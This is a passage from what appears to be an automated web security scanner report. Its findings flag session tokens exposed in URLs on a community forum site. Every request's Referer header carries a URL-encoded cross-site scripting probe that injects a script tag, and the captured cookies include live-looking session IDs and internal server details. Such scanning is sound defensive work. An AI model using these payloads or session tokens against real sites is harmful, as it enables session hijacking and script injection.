Content-Language: en-US
JP: D=10206 t=1313157137208695
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.33. https://www.x.com/people/theatreus/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/theatreus/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/theatreus/avatar;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:03 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=9054 t=1313158263705381
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.34. https://www.x.com/people/thomlizpa/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/thomlizpa/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/thomlizpa/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8367 t=1313157137320405
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.35. https://www.x.com/people/tifroz/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/tifroz/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/tifroz/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=12547 t=1313157143974667
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.36. https://www.x.com/people/tim_hunt/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/tim_hunt/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/tim_hunt/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7508 t=1313157137035182
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.37. https://www.x.com/people/timneu22/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/timneu22/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/timneu22/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:21 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=11518 t=1313157142392525
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.38. https://www.x.com/people/vmchatt/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/vmchatt/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/vmchatt/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=9494 t=1313157144350838
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.39. https://www.x.com/people/xavijr/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/xavijr/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/xavijr/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8711 t=1313157143991473
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.40. https://www.x.com/plugins/app-type-plugin/styles/app.css  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /plugins/app-type-plugin/styles/app.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/app-type-plugin/styles/app.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:53 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 16107
JP: D=316 t=1313157136338896
Vary: User-Agent
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive

.jive-icon-app-sml {
background-image: url( ../images/app-12x12.gif);
background-position: 0 0;
}

.jive-icon-app-med {
background-image: url( ../images/app-16x16.gif);
background-posi
...[SNIP]...

3.41. https://www.x.com/plugins/borderless-widget-plugin/classes/borderless-widget.css  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /plugins/borderless-widget-plugin/classes/borderless-widget.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/borderless-widget-plugin/classes/borderless-widget.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:18 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:53 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 488
JP: D=25771 t=1313157139008468
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/* Magical boderless widget */

#jive-widget-content .jive-widget-container .jive-widget-borderless .jive-widget-header {
display: none;
}

#jive-widget-content .jive-widget-container .jive-widget
...[SNIP]...

3.42. https://www.x.com/plugins/content-widgets/classes/community-widget.css  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /plugins/content-widgets/classes/community-widget.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/content-widgets/classes/community-widget.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:53 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 1257
JP: D=524 t=1313157136334441
Vary: User-Agent
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive

/* Magical boderless widget */

#jive-widget-content .jive-widget-container .jive-widget-borderless .jive-widget-header {
display: none;
}

#jive-widget-content .jive-widget-container .jive-widget
...[SNIP]...

3.43. https://www.x.com/plugins/digg-style-voting/scripts/plugin.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /plugins/digg-style-voting/scripts/plugin.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/digg-style-voting/scripts/plugin.js;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:51 GMT
Cache-Control: max-age=60
Content-Type: text/javascript
Content-Length: 4235
JP: D=443 t=1313157136339069
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

document.write('<script type="text/javascript" src="' + _jive_base_url + '/dwr/engine.js" ></script>');
document.write('<script type="text/javascript" src="' + _jive_base_url + '/dwr/interface/Clearv
...[SNIP]...

3.44. https://www.x.com/plugins/digg-style-voting/styles/plugin.css  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /plugins/digg-style-voting/styles/plugin.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/digg-style-voting/styles/plugin.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:53 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 4524
JP: D=324 t=1313157136644480
Vary: User-Agent
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive

.clearvote-container {
padding: 0;
overflow: hidden;
display: block;
float: right;
}

.clearvote-container .clearvote-table {
   border:0;
   border-collapse:collapse;
   float:non
...[SNIP]...

3.45. https://www.x.com/plugins/i18n-html-widget-plugin/classes/borderless-widget.css  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /plugins/i18n-html-widget-plugin/classes/borderless-widget.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/i18n-html-widget-plugin/classes/borderless-widget.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:17 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:53 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 488
JP: D=415 t=1313157138225710
Vary: User-Agent
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive

/* Magical boderless widget */

#jive-widget-content .jive-widget-container .jive-widget-borderless .jive-widget-header {
display: none;
}

#jive-widget-content .jive-widget-container .jive-widget
...[SNIP]...

3.46. https://www.x.com/plugins/idea-type-plugin/resources/styles/idea.css  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /plugins/idea-type-plugin/resources/styles/idea.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/idea-type-plugin/resources/styles/idea.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:53 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 13894
JP: D=348 t=1313157136390261
Vary: User-Agent
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive

body .jive-icon-idea-sml,
body .jive-icon-idea-med,
body .jive-icon-idea-big,
.voted-up .voted-arrow,
.voted-down .voted-arrow,
.vote-button {
   background-image: url(../images/j-ideas-sprites.png);
   _
...[SNIP]...

3.47. https://www.x.com/resources/images/status/statusicon-01.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /resources/images/status/statusicon-01.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /resources/images/status/statusicon-01.gif;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:08 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:37:07 GMT
Cache-Control: max-age=60
